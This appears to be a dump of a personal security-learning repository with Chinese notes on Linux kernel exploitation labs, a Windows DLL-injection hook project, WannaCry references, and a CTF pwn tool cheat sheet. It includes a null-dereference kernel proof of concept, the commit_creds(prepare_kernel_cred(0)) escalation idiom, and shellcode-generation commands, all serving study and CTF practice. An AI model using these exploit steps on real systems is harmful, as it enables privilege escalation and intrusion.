23 | 1. [qemu kernel debug](https://en.wikibooks.org/wiki/QEMU/Debugging_with_QEMU) 24 | 2. [setup linux kernel in qemu](https://beyermatthias.de/blog/2016/11/01/setup-for-linux-kernel-dev-using-qemu/) 25 | 26 | 27 | -------------------------------------------------------------------------------- /Kernel/Environment/busybox/x86-busybox/init: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | mount -t proc none /proc 4 | mount -t sysfs none /sys 5 | 6 | echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n" 7 | 8 | echo ''' 9 | i ii i 10 | ii iii iii iii 11 | ii iii 12 | iiiiii iiii iiiiiiiii iii iiiii 13 | iiiii ii iii ii iiiii iii 14 | iiii ii iiii iiii iii 15 | ii ii iiiii iii ii 16 | ii ii iii iii ii 17 | ii iiii i iii iii ii 18 | i ii iiii i ii 19 | 20 | ''' 21 | 22 | su fish 23 | exec /bin/sh 24 | 25 | 26 | -------------------------------------------------------------------------------- /Kernel/Environment/busybox/x86-busybox/linuxrc: -------------------------------------------------------------------------------- 1 | bin/busybox -------------------------------------------------------------------------------- /Kernel/Environment/busybox/x86-busybox/null_dereference.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Kernel/Environment/busybox/x86-busybox/null_dereference.ko -------------------------------------------------------------------------------- /Kernel/Environment/busybox/x86-busybox/prod.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | find . -print0 \ 4 | | cpio --null -ov --format=newc \ 5 | | gzip -9 > /tmp/initramfs-busybox-x86.cpio.gz 6 | 7 | -------------------------------------------------------------------------------- /Kernel/Environment/initbusybox.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | touch etc/passwd 4 | touch etc/group 5 | echo '''root:x:0:0:root:/root:/bin/sh 6 | fish:x:1000:1000:suctf:/home/fish:/bin/sh''' >> etc/passwd 7 | 8 | echo '''root:x:0: 9 | tty:x:4: 10 | fish:x:1000:''' >> etc/group 11 | 12 | -------------------------------------------------------------------------------- /Kernel/Environment/linux_source/f1sh/.built-in.o.cmd: -------------------------------------------------------------------------------- 1 | cmd_f1sh/built-in.o := ld -m elf_i386 -r -o f1sh/built-in.o f1sh/sys_f1sh.o 2 | -------------------------------------------------------------------------------- /Kernel/Environment/linux_source/f1sh/.sys_f1sh.o.cmd: -------------------------------------------------------------------------------- 1 | cmd_f1sh/sys_f1sh.o := gcc -Wp,-MD,f1sh/.sys_f1sh.o.d -nostdinc -isystem /usr/lib/gcc/i686-linux-gnu/4.8/include -Iinclude -I/home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include -include include/linux/autoconf.h -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Wno-format-security -fno-delete-null-pointer-checks -O2 -m32 -msoft-float -mregparm=3 -freg-struct-return -mpreferred-stack-boundary=2 -march=i686 -mtune=generic -Wa,-mtune=generic32 -ffreestanding -fstack-protector -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -Wframe-larger-than=1024 -fno-omit-frame-pointer -fno-optimize-sibling-calls -g -pg -Wdeclaration-after-statement -Wno-pointer-sign -fno-strict-overflow -fno-dwarf2-cfi-asm -fconserve-stack -D"KBUILD_STR(s)=\#s" -D"KBUILD_BASENAME=KBUILD_STR(sys_f1sh)" -D"KBUILD_MODNAME=KBUILD_STR(sys_f1sh)" -D"DEBUG_HASH=39" -D"DEBUG_HASH2=34" -c -o f1sh/.tmp_sys_f1sh.o f1sh/sys_f1sh.c 2 | 3 | deps_f1sh/sys_f1sh.o := \ 4 | f1sh/sys_f1sh.c \ 5 | include/linux/kernel.h \ 6 | $(wildcard include/config/lbdaf.h) \ 7 | $(wildcard include/config/preempt/voluntary.h) \ 8 | $(wildcard include/config/debug/spinlock/sleep.h) \ 9 | $(wildcard include/config/prove/locking.h) \ 10 | $(wildcard include/config/printk.h) \ 11 | $(wildcard include/config/dynamic/debug.h) \ 12 | $(wildcard include/config/ring/buffer.h) \ 13 | $(wildcard include/config/tracing.h) \ 14 | $(wildcard include/config/numa.h) \ 15 | $(wildcard include/config/ftrace/mcount/record.h) \ 16 | /usr/lib/gcc/i686-linux-gnu/4.8/include/stdarg.h \ 17 | include/linux/linkage.h \ 18 | include/linux/compiler.h \ 19 | $(wildcard include/config/trace/branch/profiling.h) \ 20 | $(wildcard include/config/profile/all/branches.h) \ 21 | $(wildcard include/config/enable/must/check.h) \ 22 | $(wildcard include/config/enable/warn/deprecated.h) \ 23 | include/linux/compiler-gcc.h \ 24 | $(wildcard include/config/arch/supports/optimized/inlining.h) \ 25 | $(wildcard include/config/optimize/inlining.h) \ 26 | include/linux/compiler-gcc4.h \ 27 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/linkage.h \ 28 | $(wildcard include/config/x86/32.h) \ 29 | $(wildcard include/config/x86/64.h) \ 30 | $(wildcard include/config/x86/alignment/16.h) \ 31 | include/linux/stringify.h \ 32 | include/linux/stddef.h \ 33 | include/linux/types.h \ 34 | $(wildcard include/config/uid16.h) \ 35 | $(wildcard include/config/phys/addr/t/64bit.h) \ 36 | $(wildcard include/config/64bit.h) \ 37 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/types.h \ 38 | $(wildcard include/config/highmem64g.h) \ 39 | include/asm-generic/types.h \ 40 | include/asm-generic/int-ll64.h \ 41 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/bitsperlong.h \ 42 | include/asm-generic/bitsperlong.h \ 43 | include/linux/posix_types.h \ 44 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/posix_types.h \ 45 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/posix_types_32.h \ 46 | include/linux/bitops.h \ 47 | $(wildcard include/config/generic/find/first/bit.h) \ 48 | $(wildcard include/config/generic/find/last/bit.h) \ 49 | $(wildcard include/config/generic/find/next/bit.h) \ 50 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/bitops.h \ 51 | $(wildcard include/config/x86/cmov.h) \ 52 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/alternative.h \ 53 | $(wildcard include/config/smp.h) \ 54 | $(wildcard include/config/paravirt.h) \ 55 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/asm.h \ 56 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/cpufeature.h \ 57 | $(wildcard include/config/x86/invlpg.h) \ 58 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/required-features.h \ 59 | $(wildcard include/config/x86/minimum/cpu/family.h) \ 60 | $(wildcard include/config/math/emulation.h) \ 61 | $(wildcard include/config/x86/pae.h) \ 62 | $(wildcard include/config/x86/cmpxchg64.h) \ 63 | $(wildcard include/config/x86/use/3dnow.h) \ 64 | $(wildcard include/config/x86/p6/nop.h) \ 65 | include/asm-generic/bitops/sched.h \ 66 | include/asm-generic/bitops/hweight.h \ 67 | include/asm-generic/bitops/fls64.h \ 68 | include/asm-generic/bitops/ext2-non-atomic.h \ 69 | include/asm-generic/bitops/le.h \ 70 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/byteorder.h \ 71 | include/linux/byteorder/little_endian.h \ 72 | include/linux/swab.h \ 73 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/swab.h \ 74 | $(wildcard include/config/x86/bswap.h) \ 75 | include/linux/byteorder/generic.h \ 76 | include/asm-generic/bitops/minix.h \ 77 | include/linux/log2.h \ 78 | $(wildcard include/config/arch/has/ilog2/u32.h) \ 79 | $(wildcard include/config/arch/has/ilog2/u64.h) \ 80 | include/linux/typecheck.h \ 81 | include/linux/ratelimit.h \ 82 | include/linux/param.h \ 83 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/param.h \ 84 | include/asm-generic/param.h \ 85 | $(wildcard include/config/hz.h) \ 86 | include/linux/dynamic_debug.h \ 87 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/bug.h \ 88 | $(wildcard include/config/bug.h) \ 89 | $(wildcard include/config/debug/bugverbose.h) \ 90 | include/asm-generic/bug.h \ 91 | $(wildcard include/config/generic/bug.h) \ 92 | $(wildcard include/config/generic/bug/relative/pointers.h) \ 93 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/div64.h \ 94 | 95 | f1sh/sys_f1sh.o: $(deps_f1sh/sys_f1sh.o) 96 | 97 | $(deps_f1sh/sys_f1sh.o): 98 | -------------------------------------------------------------------------------- /Kernel/Environment/linux_source/f1sh/Makefile: -------------------------------------------------------------------------------- 1 | obj-y := sys_f1sh.o 2 | -------------------------------------------------------------------------------- /Kernel/Environment/linux_source/f1sh/sys_f1sh.c: -------------------------------------------------------------------------------- 1 | #include 2 | #define F1SH_DEBUG 1 3 | asmlinkage long sys_f1sh(int arg0) 4 | { 5 | #if F1SH_DEBUG 6 | printk("syscall arg %d",arg0); 7 | printk("\n23333333\n"); 8 | #endif 9 | return ((long)arg0); 10 | } 11 | -------------------------------------------------------------------------------- /Kernel/Environment/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | qemu-system-x86_64 \ 4 | -kernel obj/linux-x86-basic/arch/x86_64/boot/bzImage \ 5 | -initrd /tmp/initramfs-busybox-x86.cpio.gz \ 6 | -nographic -append "console=ttyS0 quiet" \ 7 | -monitor /dev/null \ 8 | -nographic \ 9 | 2>/dev/null 10 | 11 | -------------------------------------------------------------------------------- /Kernel/Environment/src/Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | CFLAGS=-static 3 | RM = rm -f 4 | 5 | ELF_BIN=poc 6 | 7 | .DEFAULT_GOAL := all 8 | all: $(ELF_BIN) 9 | 10 | $(ELF_BIN): poc.c 11 | $(CC) $(CFLAGS) $^ -o $@ 12 | 13 | clean: 14 | $(RM) $(ELF_BIN) 15 | 16 | -------------------------------------------------------------------------------- /Kernel/Environment/src/poc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | char payload[] = "\xe9\xea\xbe\xad\x0b";//jmp 0xbadbeef 8 | int main() 9 | { 10 | mmap(0, 4096,PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS ,-1, 0); 11 | memcpy(0, payload, sizeof(payload)); 12 | int fd = open("/proc/bug1", O_WRONLY); 13 | write(fd, "f1sh", 4); 14 | return 0; 15 | } 16 | -------------------------------------------------------------------------------- /Kernel/README.md: -------------------------------------------------------------------------------- 1 | 2 | ## Resources 3 | 4 | 1. [linux kernel exploitation](https://github.com/xairy/linux-kernel-exploitation) 5 | 6 | ## debug 7 | 8 | ### symbol 9 | 如果`module`没有去`symbol`,可以加载下`symbol`方便调试 10 | ``` 11 | add-symbol-file example.ko [address] 12 | ``` 13 | 14 | ### find function address 15 | 16 | in `busybox` 17 | ``` 18 | grep prepare_kernel_cred /proc/kallsyms 19 | ``` 20 | 21 | ## basic 22 | 23 | 提权 24 | ```C 25 | commit_creds(prepare_kernel_cred(0)); 26 | ``` 27 | 28 | ## To be continued 29 | 30 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.26009.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dll_Hook", "Dll_Hook\Dll_Hook.vcxproj", "{6EEE5DB7-E004-4BC0-90E6-33F1092B1343}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dll_Hook_app0", "Dll_Hook_app0\Dll_Hook_app0.vcxproj", "{325FC96A-6142-4F7C-A7AA-E3229DE19752}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Debug|x64.ActiveCfg = Debug|x64 19 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Debug|x64.Build.0 = Debug|x64 20 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Debug|x86.ActiveCfg = Debug|Win32 21 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Debug|x86.Build.0 = Debug|Win32 22 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Release|x64.ActiveCfg = Release|x64 23 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Release|x64.Build.0 = Release|x64 24 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Release|x86.ActiveCfg = Release|Win32 25 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Release|x86.Build.0 = Release|Win32 26 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Debug|x64.ActiveCfg = Debug|x64 27 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Debug|x64.Build.0 = Debug|x64 28 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Debug|x86.ActiveCfg = Debug|Win32 29 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Debug|x86.Build.0 = Debug|Win32 30 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Release|x64.ActiveCfg = Release|x64 31 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Release|x64.Build.0 = Release|x64 32 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Release|x86.ActiveCfg = Release|Win32 33 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | EndGlobal 39 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Dll_Hook.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Malware/Dll_Hook/Dll_Hook/Dll_Hook.aps -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Dll_Hook.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Malware/Dll_Hook/Dll_Hook/Dll_Hook.cpp -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Dll_Hook.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #ifdef INJ_DLL_API 12 | 13 | #else 14 | 15 | #define INJ_DLL_API extern "C" __declspec(dllexport) 16 | 17 | #endif 18 | 19 | INJ_DLL_API void WINAPI StartHook(void); 20 | INJ_DLL_API void WINAPI StopHook(void); 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Dll_Hook.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Malware/Dll_Hook/Dll_Hook/Dll_Hook.rc -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Dll_Hook.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343} 23 | Win32Proj 24 | Dll_Hook 25 | 10.0.14393.0 26 | 27 | 28 | 29 | DynamicLibrary 30 | true 31 | v141 32 | Unicode 33 | 34 | 35 | DynamicLibrary 36 | false 37 | v141 38 | true 39 | Unicode 40 | 41 | 42 | DynamicLibrary 43 | true 44 | v141 45 | Unicode 46 | 47 | 48 | DynamicLibrary 49 | false 50 | v141 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_WINDOWS;_USRDLL;DLL_HOOK_EXPORTS;%(PreprocessorDefinitions) 91 | 92 | 93 | Windows 94 | Source.def 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_WINDOWS;_USRDLL;DLL_HOOK_EXPORTS;%(PreprocessorDefinitions) 104 | 105 | 106 | Windows 107 | Source.def 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_HOOK_EXPORTS;%(PreprocessorDefinitions) 119 | 120 | 121 | Windows 122 | true 123 | true 124 | Source.def 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_WINDOWS;_USRDLL;DLL_HOOK_EXPORTS;%(PreprocessorDefinitions) 136 | 137 | 138 | Windows 139 | true 140 | true 141 | Source.def 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Dll_Hook.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | 23 | 24 | 头文件 25 | 26 | 27 | 头文件 28 | 29 | 30 | 31 | 32 | 资源文件 33 | 34 | 35 | 36 | 37 | 源文件 38 | 39 | 40 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Source.def: -------------------------------------------------------------------------------- 1 | LIBRARY "Dll_Hook" 2 | EXPORTS 3 | StartHook @1 4 | StopHook @2 5 | 6 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/resource.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Malware/Dll_Hook/Dll_Hook/resource.h -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook_app0/Dll_Hook_app0.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {325FC96A-6142-4F7C-A7AA-E3229DE19752} 23 | Win32Proj 24 | Dll_Hook_app0 25 | 10.0.14393.0 26 | 27 | 28 | 29 | Application 30 | true 31 | v141 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v141 38 | true 39 | Unicode 40 | 41 | 42 | Application 43 | true 44 | v141 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v141 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | 95 | 96 | 97 | 98 | 99 | 100 | Level3 101 | Disabled 102 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 103 | 104 | 105 | Console 106 | 107 | 108 | 109 | 110 | Level3 111 | 112 | 113 | MaxSpeed 114 | true 115 | true 116 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 117 | 118 | 119 | Console 120 | true 121 | true 122 | 123 | 124 | 125 | 126 | Level3 127 | 128 | 129 | MaxSpeed 130 | true 131 | true 132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | 134 | 135 | Console 136 | true 137 | true 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook_app0/Dll_Hook_app0.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook_app0/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | typedef void (*AddFunc)(void); 10 | 11 | int main() 12 | { 13 | HMODULE hDll = LoadLibrary(_T("Dll_Hook.dll")); 14 | AddFunc StartHook = (AddFunc)GetProcAddress(hDll, "StartHook"); 15 | AddFunc StopHook = (AddFunc)GetProcAddress(hDll, "StopHook"); 16 | if (StartHook != NULL) 17 | { 18 | printf_s("found StartMonitoring function\n"); 19 | StartHook(); 20 | } 21 | StopHook(); 22 | return 0; 23 | } 24 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ## Preface 4 | 5 | 一个简单的64bit dll注入,C++实现 6 | 7 | 8 | -------------------------------------------------------------------------------- /Malware/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ## virus 4 | 5 | 病毒orz 6 | -------------------------------------------------------------------------------- /Malware/wannacry/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ## Preface 4 | 5 | 2017-05-12 -- WannaCry 6 | 7 | ## Reference 8 | [FreeBuf0](http://www.freebuf.com/vuls/134602.html)
9 | [anz1](https://securingtomorrow.mcafee.com/mcafee-labs/analysis-wannacry-ransomware/) 10 | 11 | ### 样本 12 | 13 | http://bbs.pediy.com/thread-217586.htm 14 | -------------------------------------------------------------------------------- /Pwn/README.md: -------------------------------------------------------------------------------- 1 | ![](pwn_pwn.jpg) 2 | 3 | ## 1. 工具 4 | IDA+pwndbg+pwntools+... 5 | 6 | ### IDA 7 | 先祭上神器 8 | 9 | ### pwndbg 10 | 这个比peda好用一点。推荐。 11 | 12 | - **stack** 100 查看栈信息 13 | - **heap** -h 查看堆(需要更全的heap插件可以看[libheap](https://github.com/cloudburst/libheap),不过这个基本够了) 14 | 15 | #### gdb自定义hook(这里自定制用,其实pwngdbg自带就完全足够了) 16 | ```asm 17 | define hook-stop 18 | >info registers 19 | >x/24wx $esp 20 | >x/2i $eip 21 | >end 22 | ``` 23 | 24 | ### pwntools 25 | 具体网上一堆教程如:[pwntools使用](http://www.cnblogs.com/pcat/p/5451780.html),这里就是个人整理一点 26 | 27 | ```Python 28 | p = process('./pwnfun') # 挂载进程 29 | elf = ELF('./pwnfun') # 看到的结果就和checksec一样 30 | p.interactive() # 弹shell 31 | context.log_level = 'debug' # 挂进程之后显示各种调试信息 32 | ``` 33 | - **DynELF**这个用来leak十分好用,不过leak格式比较难写,有点迷 34 | - elf.got['puts'] 这个少用,也有点迷,用ROPgadget(见下文)代替比较好 35 | 36 | #### dbg 37 | 38 | 关闭ptrace使得能够attach 39 | ``` 40 | echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope 41 | ``` 42 | 程序中调用调试 43 | ``` 44 | gdb_code='b *0x4009F2\nb *0x400A6D\nb *0x400778\nb*0x400944\n' 45 | gdb.attach(proc.pidof(io)[0],gdb_code) 46 | ``` 47 | 48 | ### checksec(pwntools中也有) 49 | 50 | ``` 51 | CANARY : 覆盖返回地址基本不可利用 52 | FORTIFY : 一种安全机制 53 | NX : 堆栈不可执行 54 | PIE : 攻击时需要泄露地址 55 | RELRO : Partial: 不可修改strtab 56 | Full : 程序装载时填充got表 57 | ``` 58 | 59 | ### ropper 60 | 61 | 之前一直用`ROPgadget`,不过后来发现还是`ropper`更好 62 | 63 | ### metsploit 64 | ```bash 65 | msfconsole 66 | msf > 67 | show payloads: 显示所有渗透模块 68 | use linux/x64/exec: 使用linux x64 模块 69 | set cmd /bin/sh 70 | generate -t py -b "/x00":产生shellcode /xXX的形式 71 | ``` 72 | 73 | ### redare2(要用的话再积累 IDA更加方便) 74 | ```gdb 75 | aaa 76 | [x] Analyze all flags starting with sym. and entry0 (aa) 77 | [x] Analyze len bytes of instructions for references (aar) 78 | [x] Analyze function calls (aac) 79 | s sym.main:运行到main处 80 | pdf:打印汇编 81 | odd [strings]: 给参数来运行程序 82 | dc: 运行程序 83 | db: 下断点 84 | dr: 查看所有寄存器信息 85 | VV: 查看调用关系视图 86 | afvn [name] [name]: 重命名,类似ida的n 87 | 88 | echo disass main | gdb ./[program] 利用管道来调试 89 | "\41\xffABCD".encode('hex' 90 | set disassembly-flavor intel 设置为x86汇编显示 91 | ``` 92 | 93 | 94 | ## 2. Complie 95 | - gcc 96 | ```bash 97 | -fno-stack-protector// 去除栈保护 如 gcc -m32 -g -fno-stack-protector -z execstack -o vuln vuln.c 98 | ``` 99 | - nasm 100 | ```bash 101 | nasm -f elf -o vlun.o vuln.asm //编译 102 | ld -m elf_i386 -s -o vuln vuln.o vuln.o //链接 103 | ./vuln 运行 104 | ``` 105 | 106 | ## 3. 一些姿势 107 | 108 | ### 连接 109 | ```bash 110 | ssh user@192.168.47.143 用来连接目标主机 111 | scp user@192.168.47.143 [filename] [dir] 112 | scp -P2222 col@pwnable.kr:/home/passcode 113 | ``` 114 | ### 程序加载追踪 115 | ```bash 116 | ltrace 117 | strace 118 | ``` 119 | ### 测试 120 | 主要看socat用法 121 | ```bash 122 | socat tcp-listen:12345 exec:./stack_overflow 把程序放到本机运行 123 | socat tcp-listen:22333,reuseaddr,fork system:./pwnme 保持程序一直执行 124 | nc 127.0.0.1 12345 本地测试连接 125 | ``` 126 | 127 | ### 调试`libc`源码 128 | 129 | 基本步骤不难 130 | 131 | 1. 安装`libc`的调试库 132 | ```bash 133 | # x86_64 134 | sudo apt-get install libc6-dbg 135 | # 32bit 可以安装下面的 136 | sudo apt-get install libc6:i386 137 | sudo apt-get install libc6-dbg:i386 138 | ``` 139 | 140 | 2. 把源码下下来`sudo apt install glibc-source` 141 | 142 | 3. 进入`gdb`,指定源码目录(比如malloc) 143 | ```bash 144 | pwndbg> dir /usr/src/glibc/glibc-2.26/malloc 145 | Source directories searched: /usr/src/glibc/glibc-2.26/malloc:/usr/src/glibc/glibc-2.26:$cdir:$cwd 146 | ──────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────────────────── 147 | 3052 #define MAYBE_INIT_TCACHE() 148 | 3053 #endif 149 | 3054 150 | 3055 void * 151 | 3056 __libc_malloc (size_t bytes) 152 | ► 3057 { 153 | 3058 mstate ar_ptr; 154 | 3059 void *victim; 155 | 3060 156 | 3061 void *(*hook) (size_t, const void *) 157 | 3062 = atomic_forced_read (__malloc_hook); 158 | ``` 159 | 160 | ### Docker 161 | 162 | 写好Dockerfile之后 163 | ``` 164 | # 构建image,注意网络配置 165 | sudo docker build --network=host -t csaw:warmup . 166 | # 运行 注意端口映射 167 | sudo docker run -p 8000:8000 csaw:warmup 168 | ``` 169 | 具体`docker`相关的配置在`docker_env`里面 170 | 171 | ### Centos 相关 172 | 173 | centos可能默认开了防火墙 所以端口都是关闭的 但是关闭防火墙又不太好,所以开放对应端口就好了 174 | 175 | - 通过命令开启允许对外访问的网络端口(这里是23333): 176 | ```bash 177 | /sbin/iptables -I INPUT -p tcp --dport 23333 -j ACCEPT 178 | /etc/rc.d/init.d/iptables save 179 | /etc/rc.d/init.d/iptables restart 180 | /etc/init.d/iptables status// 查看端口是否开放 181 | 